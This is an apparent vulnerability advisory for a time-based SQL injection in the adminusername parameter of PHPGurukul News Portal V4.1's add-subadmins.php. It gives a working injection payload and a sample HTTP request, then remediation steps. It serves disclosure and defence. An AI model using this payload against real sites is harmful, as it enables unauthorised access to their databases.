PHPGurukul News Portal V4.1 SQL Injection in add-subadmins.php

### Vulnerability Overview * **Vulnerability Name**: PHPGurukul News Portal Project V4.1 /admin/add-subadmins.php SQL Injection * **Vulnerability Type**: SQL Injection * **Affected Product**: News Portal Project ### Scope of Impact * **Affected File**: `/admin/add-subadmins.php` * **Affected Version**: V4.1 * **Vulnerable Parameter**: `adminusername` * **Root Cause**: The parameter is used directly in SQL queries without proper sanitization or validation, allowing attackers to inject malicious SQL statements. ### Proof of Concept (POC) **Payload:** ```text adminusername=AAA' RLIKE SLEEP(5) AND 'upg'='upg&email=123@gmail.com&pwd=AAA&submit= ``` **Vulnerability Request Packet:** ```http POST /newportal/admin/add-subadmins.php HTTP/1.1 Host: 192.168.8.55:8088 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 58 Origin: http://192.168.8.55:8088 Connection: keep-alive Referer: http://192.168.8.55:8088/newportal/admin/add-subadmins.php Cookie: PHPSESSID=bfj7rsudh73ulqyubk0761 Upgrade-Insecure-Requests: 1 Priority: u=0, i adminusername=AAA&email=123@gmail.com&pwd=AAA&submit= ``` ### Remediation Measures 1. **Use Prepared Statements and Parameter Binding**: Employ prepared statements as an effective safeguard against SQL injection, as they separate SQL code from user input data. 2. **Conduct Input Validation and Filtering**: Strictly validate and filter user input data to ensure it conforms to expected formats, thereby blocking malicious inputs. 3. **Minimize Database User Permissions**: Ensure that the account used to connect to the database possesses only the minimum necessary permissions, avoiding the use of accounts with elevated privileges (such as root or admin) for routine operations.

Goal Reached Thanks to every supporter — we hit 100%!

PHPGurukul News Portal V4.1 SQL Injection in add-subadmins.php

More from this source